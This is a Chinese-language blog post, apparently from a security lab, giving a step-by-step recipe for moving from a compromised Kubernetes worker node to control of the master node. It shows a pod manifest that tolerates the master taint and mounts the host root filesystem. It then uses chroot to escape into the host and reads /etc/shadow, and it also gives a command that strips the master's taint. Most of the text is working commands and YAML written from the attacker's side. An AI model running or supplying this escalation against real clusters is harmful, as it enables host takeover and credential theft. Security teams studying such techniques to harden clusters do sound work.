原创 Al1ex 七芒星实验室
污点是K8s高级调度的特性,用于限制哪些Pod可以被调度到某一个节点,一般主节点包含一个污点,这个污点是阻止Pod调度到主节点上面,除非有Pod能容忍这个污点,而通常容忍这个污点的Pod都是系统级别的Pod,例如:kube-system
基本原理
攻击者在获取到node节点的权限后可以通过kubectl来创建一个能够容忍主节点的污点的Pod,当该Pod被成功创建到Master上之后,攻击者可以通过在子节点上操作该Pod实现对主节点的控制
横向移动
Step 1:Node中查看节点信息
kubectl get nodes
Step 2:确认Master节点的容忍度
#方式一
kubectl describe nodes master
#方式二
kubectl describe node master | grep 'Taints' -A 5
Step 3:创建带有容忍参数的Pod(必要时可以修改Yaml使Pod增加到特定的Node上去)
apiVersion: v1
kind: Pod
metadata:
name: control-master-15
spec:
tolerations:
- key: node-role.kubernetes.io/master
operator: Exists
effect: NoSchedule
containers:
- name: control-master-15
image: ubuntu:18.04
command: ["/bin/sleep", "3650d"]
volumeMounts:
- name: master
mountPath: /master
volumes:
- name: master
hostPath:
path: /
type: Directory
#创建Pod
kubectl create -f control-master.yaml
#部署情况
kubectl get deploy -o wide
#Pod详情
kubectl get pod -o wide
Step 4:获得Master控制端
kubectl exec control-master-15 -it bash
chroot /master bash
ls -al
cat /etc/shadow
扩展技巧
执行以下命令清除污点之后直接执行部署Pod到Master上,之后通过挂载实现逃逸获取Master节点的权限
#清除污点
kubectl taint nodes debian node-role.kubernetes.io/master:NoSchedule-
#查看污点
kubectl describe node master | grep 'Taints' -A 5